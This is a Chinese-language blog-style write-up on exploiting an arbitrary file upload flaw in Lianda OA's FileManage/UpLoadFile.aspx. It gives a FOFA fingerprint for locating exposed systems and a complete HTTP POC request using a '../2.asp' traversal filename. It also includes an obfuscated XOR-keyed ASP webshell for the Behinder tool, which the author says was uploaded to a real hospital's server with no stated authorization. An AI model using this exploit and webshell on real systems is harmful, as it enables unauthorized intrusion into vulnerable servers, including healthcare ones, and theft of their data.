前言

OA系统似乎一直都是渗透测试的“重点关照对象”,今天在翻看之前的nDay时,看到了“联达OA在FileManage-UpLoadFile处存在任意文件上传”,看了下没有特别复杂的复现条件,于是乎就打开fofa,搜索了一番,最后找到了某医院的OA系统,成功上传一句话木马,获得服务器权限。

资产搜集

fofa:

body="Resource/js/LKSys_WindowControlScript.js"

查看之后,发现不少医院都使用这款OA系统。

漏洞验证

使用如下POC任意上传文件:

POST /FileManage/UpLoadFile.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.1707.77 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: {{hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 241
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="DesignId"

1
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="../2.asp"
Content-Type: image/png

<% response.write("This is a test!") %>
--00content0boundary00--

在响应体中发现文件上传成功的提示,访问https://hostname/FileManage/2.asp,发现asp脚本被成功执行:

尝试作死

接下来尝试写入小马(危险操作!!!):

<% 
<!-- 
Response.CharSet = "UTF-8" 
Bckq11="dfff0a7fa1a55c8c"  
Session("k")=Bckq11 
C3O3=Request.TotalBytes 
QNGSU=Request.BinaryRead(C3O3) 
For i=1 To C3O3 
Lz61Z4=ascb(midb(QNGSU,i,1)) Xor Asc(Mid(Bckq11,(i and 15)+1,1))  
VSRBJ=VSRBJ&Chr(Lz61Z4) 
Next 
execute(VSRBJ)REM ) 
-->
%>

上传成功之后尝试使用冰蝎连接,直接拿下!